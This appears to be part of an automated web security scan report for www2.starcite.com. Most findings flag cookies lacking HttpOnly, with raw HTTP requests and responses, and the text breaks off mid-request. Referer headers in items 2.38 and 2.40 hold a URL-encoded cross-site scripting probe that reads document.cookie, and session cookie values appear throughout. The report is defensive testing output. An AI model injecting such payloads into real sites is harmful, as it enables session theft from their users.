GIF89a<.%....i..4n.....V..............L.....a....O...=.......!.......,....<.%....P.I../...1].dWi......0J..q...q8h...@6@4...r.D6.4..P.......L*...w.."....ZZ....Xy{.....I#......|z{..n...x.s|....E....H..
...[SNIP]...

2.23. http://www2.starcite.com/starcite/files/what-we-do-header.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/what-we-do-header.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/what-we-do-header.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:42 GMT
Server: Apache
Last-Modified: Fri, 07 Nov 2008 16:21:00 GMT
ETag: "10000000022fa-14fc5-45b1bcc85c5ea"
Accept-Ranges: bytes
Content-Length: 85957
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:07 GMT;path=/

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

2.24. http://www2.starcite.com/starcite/files/whitepapers_icon.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/whitepapers_icon.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/whitepapers_icon.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:31 GMT
Server: Apache
Last-Modified: Wed, 21 Apr 2010 19:20:49 GMT
ETag: "20000000031a5-199b-484c41778332b"
Accept-Ranges: bytes
Content-Length: 6555
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:57 GMT;path=/

.PNG
.
...IHDR...{...|.....I.......tEXtSoftware.Adobe ImageReadyq.e<...=IDATx..]    xTU...*..+Y.....P...(.,.q.DTP..t.L+....[F.B.[O;~.6v..h....8"..B.!....Y.......sn.Wy...TU^%..N........9..s.=.`......9.
...[SNIP]...

2.25. http://www2.starcite.com/starcite/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/home HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=45
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:32:59 GMT;path=/
Content-Length: 39445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--preload images
...[SNIP]...

2.26. http://www2.starcite.com/starcite/images/bg_btm1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/bg_btm1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/bg_btm1.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:33 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:33:00 GMT
ETag: "100000000247f-d0-4579a43becb00"
Accept-Ranges: bytes
Content-Length: 208
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:59 GMT;path=/

GIF89a.......................................................!.......,..........}..@..8....`(.di.h..l..p,.tm.x..|...A.+....r.l:...tJ.n....@.X...xL.....z< ..pCBA.....~.................................
...[SNIP]...

2.27. http://www2.starcite.com/starcite/images/bg_midtop.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/bg_midtop.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/bg_midtop.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:27 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:33:00 GMT
ETag: "1000000002481-1dd-4579a43becb00"
Accept-Ranges: bytes
Content-Length: 477
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:53 GMT;path=/

GIF89a.....$............................................................................................................................................................................................
...[SNIP]...

2.28. http://www2.starcite.com/starcite/images/bg_midtop_extension.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/bg_midtop_extension.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/bg_midtop_extension.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:27 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 18:23:37 GMT
ETag: "1000000003157-56c-47f573fda5c40"
Accept-Ranges: bytes
Content-Length: 1388
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:53 GMT;path=/

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...

2.29. http://www2.starcite.com/starcite/images/content_left_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/content_left_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/content_left_bg.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:27 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:33:00 GMT
ETag: "10000000024ac-bee-4579a43becb00"
Accept-Ranges: bytes
Content-Length: 3054
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:53 GMT;path=/

GIF89a.."...............................................................................................................................................................................................
...[SNIP]...

2.30. http://www2.starcite.com/starcite/images/content_right_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/content_right_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/content_right_bg.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:31 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:33:00 GMT
ETag: "10000000024ae-bfd-4579a43becb00"
Accept-Ranges: bytes
Content-Length: 3069
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:57 GMT;path=/

GIF89a..;...............................................................................................................................................................................................
...[SNIP]...

2.31. http://www2.starcite.com/starcite/images/left_bdr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/left_bdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/left_bdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:32 GMT
Server: Apache
Last-Modified: Wed, 13 Aug 2008 19:12:00 GMT
ETag: "10000000024e7-4d-4545c29b08000"
Accept-Ranges: bytes
Content-Length: 77
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:57 GMT;path=/

GIF89a..M............................!.......,......M....X.....I'....w..G.    .;

2.32. http://www2.starcite.com/starcite/images/right_bdr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/right_bdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/right_bdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:32 GMT
Server: Apache
Last-Modified: Wed, 13 Aug 2008 19:12:00 GMT
ETag: "1000000002503-70-4545c29b08000"
Accept-Ranges: bytes
Content-Length: 112
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:57 GMT;path=/

GIF89a..M....................................................!.......,......M....p.F..L..K..&.Ii.G.....D.......;

2.33. http://www2.starcite.com/starcite/images/separator.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/separator.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/separator.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:22 GMT
Server: Apache
Last-Modified: Thu, 28 Aug 2008 01:20:00 GMT
ETag: "1000000002516-32e-4557aef89d000"
Accept-Ranges: bytes
Content-Length: 814
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:47 GMT;path=/

GIF89a.................................................................................................................................................................................................
...[SNIP]...

2.34. http://www2.starcite.com/starcite/images/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/spacer.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:21 GMT
Server: Apache
Last-Modified: Wed, 13 Aug 2008 19:12:00 GMT
ETag: "1000000002518-2b-4545c29b08000"
Accept-Ranges: bytes
Content-Length: 43
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:47 GMT;path=/

GIF89a.............!.......,...........D..;

2.35. http://www2.starcite.com/starcite/jobs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/jobs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/jobs HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:23 GMT;path=/
Content-Length: 17352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.36. http://www2.starcite.com/starcite/locations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/locations

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/locations HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:00 GMT;path=/
Content-Length: 18662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.37. http://www2.starcite.com/starcite/misc/drupal.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/drupal.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/drupal.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:12 GMT
Server: Apache
Last-Modified: Mon, 16 Jul 2007 11:37:00 GMT
ETag: "1000000002556-1620-4355fe101cf00"
Accept-Ranges: bytes
Content-Length: 5664
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:37 GMT;path=/

// $Id: drupal.js,v 1.29.2.1 2007/07/15 23:07:06 drumm Exp $

var Drupal = Drupal || {};

/**
* Set the variable that indicates if JavaScript behaviors should be applied
*/
Drupal.jsEnabled = docume
...[SNIP]...

2.38. http://www2.starcite.com/starcite/misc/forms.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/forms.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/forms.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:06 GMT
Server: Apache
Last-Modified: Thu, 16 Apr 2009 21:02:12 GMT
ETag: "3000000002388-a90-467b260cdaa1f"
Accept-Ranges: bytes
Content-Length: 2704
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:32 GMT;path=/

/* ------------------------------------------------------

StarCite Forms
Dan Wilt, dan@enhancedinnovations.com

-------------------------------------------------------*/

/* ------------------
...[SNIP]...

2.39. http://www2.starcite.com/starcite/misc/jquery.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/jquery.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/jquery.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:35 GMT
Server: Apache
Last-Modified: Sun, 24 Dec 2006 10:16:00 GMT
ETag: "1000000002563-4b8c-42556f7b39800"
Accept-Ranges: bytes
Content-Length: 19340
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:00 GMT;path=/

// $Id: jquery.js,v 1.6 2006/12/23 21:46:35 dries Exp $
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/
...[SNIP]...

2.40. http://www2.starcite.com/starcite/misc/jquery/functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/jquery/functions.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/jquery/functions.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
